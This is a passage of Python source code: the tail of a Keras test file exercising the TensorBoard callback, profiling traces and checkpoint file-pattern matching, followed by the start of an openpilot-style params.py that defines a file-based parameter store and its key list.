summary_file.scalars, {
_ObservedSummary(logdir=train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=validation_dir, tag='epoch_loss'),
_ObservedSummary(
logdir=validation_dir, tag='evaluation_loss_vs_iterations'),
})
def test_TensorBoard_basic(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
_ObservedSummary(
logdir=self.validation_dir,
tag='evaluation_loss_vs_iterations'),
})
def test_TensorBoard_across_invocations(self):
"""Regression test for summary writer resource use-after-free.
See: <https://github.com/tensorflow/tensorflow/issues/25707>
"""
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
for _ in (1, 2):
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
_ObservedSummary(
logdir=self.validation_dir,
tag='evaluation_loss_vs_iterations'),
})
def test_TensorBoard_no_spurious_event_files(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
model.fit(
x,
y,
batch_size=2,
epochs=2,
callbacks=[tb_cbk])
events_file_run_basenames = set()
for (dirpath, _, filenames) in os.walk(self.train_dir):
if any(fn.startswith('events.out.') for fn in filenames):
events_file_run_basenames.add(os.path.basename(dirpath))
self.assertEqual(events_file_run_basenames, {'train'})
def test_TensorBoard_batch_metrics(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir, update_freq=1)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
_ObservedSummary(
logdir=self.validation_dir,
tag='evaluation_loss_vs_iterations'),
},
)
def test_TensorBoard_learning_rate_schedules(self):
model = self._get_model(compile_model=False)
opt = gradient_descent.SGD(learning_rate_schedule.CosineDecay(0.01, 1))
model.compile(opt, 'mse', run_eagerly=test_utils.should_run_eagerly())
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
model.fit(
x,
y,
batch_size=2,
epochs=2,
callbacks=[keras.callbacks.TensorBoard(self.logdir)])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.train_dir, tag='epoch_learning_rate'),
},
)
def test_TensorBoard_global_step(self):
model = self._get_model(compile_model=False)
opt = gradient_descent.SGD(learning_rate_schedule.CosineDecay(0.01, 1))
model.compile(opt, 'mse', run_eagerly=test_utils.should_run_eagerly())
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
model.fit(
x,
y,
batch_size=2,
epochs=2,
verbose=0,
callbacks=[
keras.callbacks.TensorBoard(
self.logdir,
update_freq=1,
profile_batch=0,
write_steps_per_second=True)
])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.train_dir, tag='epoch_learning_rate'),
_ObservedSummary(
logdir=self.train_dir, tag='epoch_steps_per_second'),
_ObservedSummary(
logdir=self.train_dir, tag='batch_steps_per_second'),
},
)
def test_TensorBoard_weight_histograms(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir, histogram_freq=1)
model_type = test_utils.get_model_type()
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
_ObservedSummary(
logdir=self.validation_dir,
tag='evaluation_loss_vs_iterations'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.histograms, model_type),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
},
)
def test_TensorBoard_weight_images(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, write_images=True)
model_type = test_utils.get_model_type()
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
_ObservedSummary(
logdir=self.validation_dir,
tag='evaluation_loss_vs_iterations'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.histograms, model_type),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
},
)
if summary_file.convert_from_v2_summary_proto:
expected = {
_ObservedSummary(logdir=self.train_dir, tag='bias_0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
}
else:
expected = {
_ObservedSummary(logdir=self.train_dir, tag='bias_0/image/0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/1'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/2'),
}
self.assertEqual(
self._strip_layer_names(summary_file.images, model_type),
expected
)
def test_TensorBoard_projector_callback(self):
layers = [
keras.layers.Embedding(10, 10, name='test_embedding'),
keras.layers.Dense(10, activation='relu'),
keras.layers.Dense(1, activation='sigmoid')
]
model = test_utils.get_model_from_layers(layers, input_shape=(10,))
model.compile(
optimizer='adam',
loss=keras.losses.BinaryCrossentropy(from_logits=True),
run_eagerly=test_utils.should_run_eagerly())
x, y = np.ones((10, 10)), np.ones((10, 10))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir,
embeddings_freq=1,
embeddings_metadata={'test_embedding': 'metadata.tsv'})
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
with open(os.path.join(self.logdir, 'projector_config.pbtxt')) as f:
self.assertEqual(f.readlines(), [
'embeddings {\n',
(' tensor_name: '
'"layer_with_weights-0/embeddings/.ATTRIBUTES/VARIABLE_VALUE"\n'),
' metadata_path: "metadata.tsv"\n', '}\n'
])
def test_custom_summary(self):
if not tf.executing_eagerly():
self.skipTest('Custom summaries only supported in V2 code path.')
def scalar_v2_mock(name, data, step=None):
"""A reimplementation of the scalar plugin to avoid circular deps."""
metadata = tf.compat.v1.SummaryMetadata()
# Should match value in tensorboard/plugins/scalar/metadata.py.
metadata.plugin_data.plugin_name = 'scalars'
with tf.summary.experimental.summary_scope(
name, 'scalar_summary', values=[data, step]) as (tag, _):
return tf.summary.write(
tag=tag,
tensor=tf.cast(data, 'float32'),
step=step,
metadata=metadata)
class LayerWithSummary(keras.layers.Layer):
def call(self, x):
scalar_v2_mock('custom_summary', tf.reduce_sum(x))
return x
model = test_utils.get_model_from_layers([LayerWithSummary()],
input_shape=(5,),
name='model')
model.compile(
'sgd',
'mse',
run_eagerly=test_utils.should_run_eagerly())
tb_cbk = keras.callbacks.TensorBoard(self.logdir, update_freq=1)
x, y = np.ones((10, 5)), np.ones((10, 5))
model.fit(x, y, batch_size=2, validation_data=(x, y), callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
_ObservedSummary(
logdir=self.validation_dir,
tag='evaluation_loss_vs_iterations'),
_ObservedSummary(
logdir=self.train_dir,
tag='model/layer_with_summary/custom_summary'),
_ObservedSummary(
logdir=self.validation_dir,
tag='model/layer_with_summary/custom_summary')
},
)
def _strip_layer_names(self, summaries, model_type):
"""Deduplicate summary names modulo layer prefix.
This removes the first slash-component of each tag name: for
instance, "foo/bar/baz" becomes "bar/baz".
Args:
summaries: A `set` of `_ObservedSummary` values.
model_type: The model type currently being tested.
Returns:
A new `set` of `_ObservedSummary` values with layer prefixes
removed.
"""
result = set()
for summary in summaries:
if '/' not in summary.tag:
raise ValueError('tag has no layer name: %r' % summary.tag)
start_from = 2 if 'subclass' in model_type else 1
new_tag = '/'.join(summary.tag.split('/')[start_from:])
result.add(summary._replace(tag=new_tag))
return result
def test_TensorBoard_invalid_argument(self):
with self.assertRaisesRegex(ValueError, 'Unrecognized arguments'):
keras.callbacks.TensorBoard(wwrite_images=True)
def test_TensorBoard_non_blocking(self):
model = keras.Sequential([keras.layers.Dense(1)])
tb = keras.callbacks.TensorBoard(self.logdir)
self.assertTrue(tb._supports_tf_logs)
cb_list = keras.callbacks.CallbackList([tb],
model=model,
epochs=1,
steps=100,
verbose=0)
tensor = tf.convert_to_tensor(1.)
def mock_numpy():
raise RuntimeError(
'If this error is seen, TensorBoard is causing a blocking '
'NumPy conversion.')
with tf.compat.v1.test.mock.patch.object(tensor, 'numpy', mock_numpy):
logs = {'metric': tensor}
cb_list.on_train_begin(logs)
cb_list.on_epoch_begin(0, logs)
cb_list.on_train_batch_begin(0, logs)
cb_list.on_train_batch_end(0, logs)
cb_list.on_epoch_end(0, logs)
cb_list.on_train_end(logs)
cb_list.on_test_begin(logs)
cb_list.on_test_batch_begin(0, logs)
cb_list.on_test_batch_end(0, logs)
cb_list.on_test_end(logs)
cb_list.on_predict_begin(logs)
cb_list.on_predict_batch_begin(logs)
cb_list.on_predict_batch_end(logs)
cb_list.on_predict_end(logs)
# Note that this test specifies model_type explicitly.
@test_combinations.run_all_keras_modes(always_skip_v1=True)
class TestTensorBoardV2NonParameterizedTest(test_combinations.TestCase):
def setUp(self):
super(TestTensorBoardV2NonParameterizedTest, self).setUp()
self.logdir = os.path.join(self.get_temp_dir(), 'tb')
self.train_dir = os.path.join(self.logdir, 'train')
self.validation_dir = os.path.join(self.logdir, 'validation')
def _get_seq_model(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3), input_shape=(10, 10, 1)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
opt = gradient_descent.SGD(learning_rate=0.001)
model.compile(
opt,
'mse',
run_eagerly=test_utils.should_run_eagerly())
return model
def _count_trace_file(self, logdir):
profile_dir = os.path.join(logdir, 'plugins', 'profile')
count = 0
for (dirpath, dirnames, filenames) in os.walk(profile_dir):
del dirpath # unused
del dirnames # unused
for filename in filenames:
if filename.endswith('.trace.json.gz'):
count += 1
return count
def fitModelAndAssertKerasModelWritten(self, model):
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir,
write_graph=True,
profile_batch=0)
model.fit(
x,
y,
batch_size=2,
epochs=3,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag='keras'),
},
)
if not model.run_eagerly:
# There should be one train graph
self.assertLen(summary_file.graph_defs, 1)
for graph_def in summary_file.graph_defs:
graph_def_str = str(graph_def)
# All the model layers should appear in the graphs
for layer in model.layers:
if 'input' not in layer.name:
self.assertIn(layer.name, graph_def_str)
def test_TensorBoard_writeSequentialModel_noInputShape(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
model.compile('sgd', 'mse', run_eagerly=test_utils.should_run_eagerly())
self.fitModelAndAssertKerasModelWritten(model)
def test_TensorBoard_writeSequentialModel_withInputShape(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3), input_shape=(10, 10, 1)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
model.compile('sgd', 'mse', run_eagerly=test_utils.should_run_eagerly())
self.fitModelAndAssertKerasModelWritten(model)
def test_TensorBoard_writeModel(self):
inputs = keras.layers.Input([10, 10, 1])
x = keras.layers.Conv2D(8, (3, 3), activation='relu')(inputs)
x = keras.layers.Flatten()(x)
x = keras.layers.Dense(1)(x)
model = keras.models.Model(inputs=inputs, outputs=[x])
model.compile('sgd', 'mse', run_eagerly=test_utils.should_run_eagerly())
self.fitModelAndAssertKerasModelWritten(model)
def test_TensorBoard_autoTrace(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=1, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag=u'batch_1'),
},
)
self.assertEqual(1, self._count_trace_file(logdir=self.logdir))
def test_TensorBoard_autoTrace_outerProfiler(self):
"""Runs a profiler session that interferes with the one from the callback.
The callback will not generate a profile but execution will proceed without
crashing due to unhandled exceptions.
"""
tf.profiler.experimental.start(logdir='')
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=1, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
tf.profiler.experimental.stop(save=False)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag=u'batch_1'),
},
)
self.assertEqual(0, self._count_trace_file(logdir=self.train_dir))
def test_TensorBoard_autoTrace_tagNameWithBatchNum(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=2, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag=u'batch_2'),
},
)
self.assertEqual(1, self._count_trace_file(logdir=self.logdir))
def test_TensorBoard_autoTrace_profileBatchRangeSingle(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch='2,2', write_graph=False)
model.fit(
x,
y,
batch_size=3,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
# Trace will be logged once at the batch it stops profiling.
_ObservedSummary(logdir=self.train_dir, tag=u'batch_2'),
},
)
self.assertEqual(1, self._count_trace_file(logdir=self.logdir))
def test_TensorBoard_autoTrace_profileBatchRangeTwice(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch='10,10', write_graph=False)
model.fit(
x,
y,
batch_size=3,
epochs=10,
validation_data=(x, y),
callbacks=[tb_cbk])
time.sleep(1) # Avoids the second profile over-writing the first.
model.fit(
x,
y,
batch_size=3,
epochs=10,
validation_data=(x, y),
callbacks=[tb_cbk])
self.assertEqual(2, self._count_trace_file(logdir=self.logdir))
# Test case that replicates a Github issue.
# https://github.com/tensorflow/tensorflow/issues/37543
def test_TensorBoard_autoTrace_profileTwiceGraphMode(self):
tf.compat.v1.disable_eager_execution()
inp = keras.Input((1,))
out = keras.layers.Dense(units=1)(inp)
model = keras.Model(inp, out)
model.compile(gradient_descent.SGD(1), 'mse')
logdir = os.path.join(self.get_temp_dir(), 'tb1')
model.fit(
np.zeros((64, 1)),
np.zeros((64, 1)),
batch_size=32,
callbacks=[keras.callbacks.TensorBoard(logdir, profile_batch=1)],
)
# Verifies trace exists in the first logdir.
self.assertEqual(1, self._count_trace_file(logdir=logdir))
logdir = os.path.join(self.get_temp_dir(), 'tb2')
model.fit(
np.zeros((64, 1)),
np.zeros((64, 1)),
batch_size=32,
callbacks=[keras.callbacks.TensorBoard(logdir, profile_batch=2)],
)
# Verifies trace exists in the second logdir.
self.assertEqual(1, self._count_trace_file(logdir=logdir))
def test_TensorBoard_autoTrace_profileBatchRange(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch='1,3', write_graph=False)
model.fit(
x,
y,
batch_size=4,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
# Trace will be logged once at the batch it stops profiling.
_ObservedSummary(logdir=self.train_dir, tag=u'batch_3'),
},
)
self.assertEqual(1, self._count_trace_file(logdir=self.logdir))
def test_TensorBoard_autoTrace_profileInvalidBatchRange(self):
with self.assertRaises(ValueError):
keras.callbacks.TensorBoard(
self.logdir,
histogram_freq=1,
profile_batch='-1,3',
write_graph=False)
with self.assertRaises(ValueError):
keras.callbacks.TensorBoard(
self.logdir,
histogram_freq=1,
profile_batch='1,None',
write_graph=False)
with self.assertRaises(ValueError):
keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch='6,5', write_graph=False)
with self.assertRaises(ValueError):
keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=-1, write_graph=False)
def test_TensorBoard_autoTrace_profile_batch_largerThanBatchCount(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=10000, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
# Enabled trace only on the 10000th batch, thus it should be empty.
self.assertEmpty(summary_file.tensors)
self.assertEqual(0, self._count_trace_file(logdir=self.train_dir))
class MostRecentlyModifiedFileMatchingPatternTest(tf.test.TestCase):
def test_get_most_recently_modified_file_matching_pattern(self):
file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}.h5'
test_dir = self.get_temp_dir()
path_pattern = os.path.join(test_dir, file_pattern)
file_paths = [
os.path.join(test_dir, file_name) for file_name in
['f.batch03epoch02.h5', 'f.batch02epoch02.h5', 'f.batch01epoch01.h5']
]
for file_path in file_paths:
with open(file_path, 'w') as f:
# Ensure there are some intervals between file creation.
time.sleep(2)
f.write('foo bar')
# Ensure the files have been actually written.
self.assertEqual(
set([
os.path.join(test_dir, file_name)
for file_name in os.listdir(test_dir)
]), set(file_paths))
self.assertEqual(
keras.callbacks.ModelCheckpoint(None)
._get_most_recently_modified_file_matching_pattern(path_pattern),
file_paths[-1])
def test_some_file_not_matching_pattern(self):
file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}.h5'
test_dir = self.get_temp_dir()
path_pattern = os.path.join(test_dir, file_pattern)
file_paths = [
os.path.join(test_dir, file_name) for file_name in
['f.batch03epoch02.h5', 'f.batch02epoch02.h5', 'f.baatch01epoch01.h5']
]
for file_path in file_paths:
with open(file_path, 'w') as f:
# Ensure there are some intervals between file creation.
time.sleep(2)
f.write('foo bar')
self.assertEqual(
keras.callbacks.ModelCheckpoint(None)
._get_most_recently_modified_file_matching_pattern(path_pattern),
file_paths[-2])
def test_get_same_file_if_file_name_equals_pattern(self):
file_name = 'f.batch02.h5'
test_dir = self.get_temp_dir()
file_path = os.path.join(test_dir, file_name)
with open(file_path, 'w') as f:
f.write('foo bar')
self.assertEqual(os.path.join(test_dir, os.listdir(test_dir)[0]), file_path)
self.assertEqual(
keras.callbacks.ModelCheckpoint(
None)._get_most_recently_modified_file_matching_pattern(file_path),
file_path)
def test_get_none_if_file_does_not_exist(self):
file_name = 'f.batch02.h5'
test_dir = self.get_temp_dir()
file_path = os.path.join(test_dir, file_name)
self.assertLen(os.listdir(test_dir), 0)
self.assertEqual(
keras.callbacks.ModelCheckpoint(
None)._get_most_recently_modified_file_matching_pattern(file_path),
None)
def test_using_checkpoint_management_latest_checkpoint(self):
file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}'
ckpt_file_name = 'f.batchXepochY'
test_dir = self.get_temp_dir()
path_pattern = os.path.join(test_dir, file_pattern)
ckpt_file_path = os.path.join(test_dir, ckpt_file_name)
with open(ckpt_file_path, 'w') as f:
f.write('dummy ckpt')
tf.__internal__.train.update_checkpoint_state(
test_dir, ckpt_file_path)
file_paths = [
os.path.join(test_dir, file_name)
for file_name in ['f.batch03epoch02', 'f.batch02epoch02']
]
for file_path in file_paths:
with open(file_path, 'w') as f:
f.write('foo bar')
# The result returned from checkpoint_management.latest_checkpoint takes
# priority, so even if it was written earlier, we should still return that.
self.assertEqual(
keras.callbacks.ModelCheckpoint(None)
._get_most_recently_modified_file_matching_pattern(path_pattern),
ckpt_file_path)
class SummaryOpsTest(tf.test.TestCase):
def tearDown(self):
super(SummaryOpsTest, self).tearDown()
tf.summary.trace_off()
def keras_model(self, *args, **kwargs):
logdir = self.get_temp_dir()
writer = tf.summary.create_file_writer(logdir)
with writer.as_default():
keras.callbacks.keras_model_summary(*args, **kwargs)
writer.close()
events = events_from_logdir(logdir)
# The first event contains no summary values. The written content goes to
# the second event.
return events[1]
@test_utils.run_v2_only
def testKerasModel(self):
model = keras.Sequential(
[Dense(10, input_shape=(100,)),
Activation('relu', name='my_relu')])
event = self.keras_model(name='my_name', data=model, step=1)
first_val = event.summary.value[0]
self.assertEqual(model.to_json(), first_val.tensor.string_val[0].decode())
@test_utils.run_v2_only
def testKerasModel_usesDefaultStep(self):
model = keras.Sequential(
[Dense(10, input_shape=(100,)),
Activation('relu', name='my_relu')])
try:
tf.summary.experimental.set_step(42)
event = self.keras_model(name='my_name', data=model)
self.assertEqual(42, event.step)
finally:
# Reset to default state for other tests.
tf.summary.experimental.set_step(None)
@test_utils.run_v2_only
def testKerasModel_subclass(self):
class SimpleSubclass(keras.Model):
def __init__(self):
super(SimpleSubclass, self).__init__(name='subclass')
self.dense = Dense(10, input_shape=(100,))
self.activation = Activation('relu', name='my_relu')
def call(self, inputs):
x = self.dense(inputs)
return self.activation(x)
# Intentionally erroring out at json serialization to test the warning.
def get_config(self):
raise NotImplementedError
model = SimpleSubclass()
with tf.compat.v1.test.mock.patch.object(logging, 'warning') as mock_log:
self.assertFalse(
keras.callbacks.keras_model_summary(
name='my_name', data=model, step=1))
self.assertRegex(
str(mock_log.call_args), 'Model failed to serialize as JSON.')
@test_utils.run_v2_only
def testKerasModel_otherExceptions(self):
model = keras.Sequential()
with tf.compat.v1.test.mock.patch.object(model, 'to_json') as mock_to_json:
with tf.compat.v1.test.mock.patch.object(logging, 'warning') as mock_log:
mock_to_json.side_effect = Exception('oops')
self.assertFalse(
keras.callbacks.keras_model_summary(
name='my_name', data=model, step=1))
self.assertRegex(
str(mock_log.call_args),
'Model failed to serialize as JSON. Ignoring')
def events_from_file(filepath):
"""Returns all events in a single event file.
Args:
filepath: Path to the event file.
Returns:
A list of all tf.Event protos in the event file.
"""
result = []
raw_dataset = tf.data.TFRecordDataset([filepath])
for raw_record in raw_dataset.take(10):
event = tf.compat.v1.Event()
event.ParseFromString(raw_record.numpy())
result.append(event)
return result
def events_from_logdir(logdir):
"""Returns all events in the single eventfile in logdir.
Args:
logdir: The directory in which the single event file is sought.
Returns:
A list of all tf.Event protos from the single event file.
Raises:
AssertionError: If logdir does not contain exactly one file.
"""
assert tf.compat.v1.gfile.Exists(logdir)
files = tf.compat.v1.gfile.ListDirectory(logdir)
assert len(files) == 1, 'Found not exactly one file in logdir: %s' % files
return events_from_file(os.path.join(logdir, files[0]))
if __name__ == '__main__':
tf.test.main()
|
params.py
|
#!/usr/bin/env python3
"""ROS has a parameter server, we have files.
The parameter store is a persistent key value store, implemented as a directory with a writer lock.
On Android, we store params under params_dir = /data/params. The writer lock is a file
"<params_dir>/.lock" taken using flock(), and data is stored in a directory symlinked to by
"<params_dir>/d".
Each key, value pair is stored as a file with named <key> with contents <value>, located in
<params_dir>/d/<key>
Readers of a single key can just open("<params_dir>/d/<key>") and read the file contents.
Readers who want a consistent snapshot of multiple keys should take the lock.
Writers should take the lock before modifying anything. Writers should also leave the DB in a
consistent state after a crash. The implementation below does this by copying all params to a temp
directory <params_dir>/<tmp>, then atomically symlinking <params_dir>/<d> to <params_dir>/<tmp>
before deleting the old <params_dir>/<d> directory.
Writers that only modify a single key can simply take the lock, then swap the corresponding value
file in place without messing with <params_dir>/d.
"""
import time
import os
import errno
import shutil
import fcntl
import tempfile
import threading
from enum import Enum
from common.basedir import PARAMS
def mkdirs_exists_ok(path):
try:
os.makedirs(path)
except OSError:
if not os.path.isdir(path):
raise
class TxType(Enum):
PERSISTENT = 1
CLEAR_ON_MANAGER_START = 2
CLEAR_ON_PANDA_DISCONNECT = 3
class UnknownKeyName(Exception):
pass
keys = {
"AccessToken": [TxType.CLEAR_ON_MANAGER_START],
"AthenadPid": [TxType.PERSISTENT],
"CalibrationParams": [TxType.PERSISTENT],
"CarParams": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CarParamsCache": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CarVin": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CommunityFeaturesToggle": [TxType.PERSISTENT],
"CompletedTrainingVersion": [TxType.PERSISTENT],
"ControlsParams": [TxType.PERSISTENT],
"DisablePowerDown": [TxType.PERSISTENT],
"DisableUpdates": [TxType.PERSISTENT],
"DoUninstall": [TxType.CLEAR_ON_MANAGER_START],
"DongleId": [TxType.PERSISTENT],
"GitBranch": [TxType.PERSISTENT],
"GitCommit": [TxType.PERSISTENT],
"GitRemote": [TxType.PERSISTENT],
"GithubSshKeys": [TxType.PERSISTENT],
"HasAcceptedTerms": [TxType.PERSISTENT],
"HasCompletedSetup": [TxType.PERSISTENT],
"IsDriverViewEnabled": [TxType.CLEAR_ON_MANAGER_START],
"IsOpenpilotViewEnabled": [TxType.CLEAR_ON_MANAGER_START],
"IsLdwEnabled": [TxType.PERSISTENT],
"IsGeofenceEnabled": [TxType.PERSISTENT],
"IsMetric": [TxType.PERSISTENT],
"IsOffroad": [TxType.CLEAR_ON_MANAGER_START],
"IsRHD": [TxType.PERSISTENT],
"IsTakingSnapshot": [TxType.CLEAR_ON_MANAGER_START],
"IsUpdateAvailable": [TxType.CLEAR_ON_MANAGER_START],
"IsUploadRawEnabled": [TxType.PERSISTENT],
"LastAthenaPingTime": [TxType.PERSISTENT],
"LastUpdateTime": [TxType.PERSISTENT],
"LimitSetSpeed": [TxType.PERSISTENT],
"LimitSetSpeedNeural": [TxType.PERSISTENT],
"LiveParameters": [TxType.PERSISTENT],
"LongitudinalControl": [TxType.PERSISTENT],
"OpenpilotEnabledToggle": [TxType.PERSISTENT],
"LaneChangeEnabled": [TxType.PERSISTENT],
"PandaFirmware": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"PandaFirmwareHex": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"PandaDongleId": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Passive": [TxType.PERSISTENT],
"RecordFront": [TxType.PERSISTENT],
"ReleaseNotes": [TxType.PERSISTENT],
"ShouldDoUpdate": [TxType.CLEAR_ON_MANAGER_START],
"SpeedLimitOffset": [TxType.PERSISTENT],
"SubscriberInfo": [TxType.PERSISTENT],
"TermsVersion": [TxType.PERSISTENT],
"TrainingVersion": [TxType.PERSISTENT],
"UpdateAvailable": [TxType.CLEAR_ON_MANAGER_START],
"UpdateFailedCount": [TxType.CLEAR_ON_MANAGER_START],
"Version": [TxType.PERSISTENT],
"Offroad_ChargeDisabled": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Offroad_ConnectivityNeeded": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_ConnectivityNeededPrompt": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_TemperatureTooHigh": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_PandaFirmwareMismatch": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Offroad_InvalidTime": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_IsTakingSnapshot": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_NeosUpdate": [TxType.CLEAR_ON_MANAGER_START],
"OpkrAutoShutdown": [TxType.PERSISTENT],
"OpkrAutoScreenOff": [TxType.PERSISTENT],
"OpkrUIBrightness": [TxType.PERSISTENT],
"OpkrEnableDriverMonitoring": [TxType.PERSISTENT],
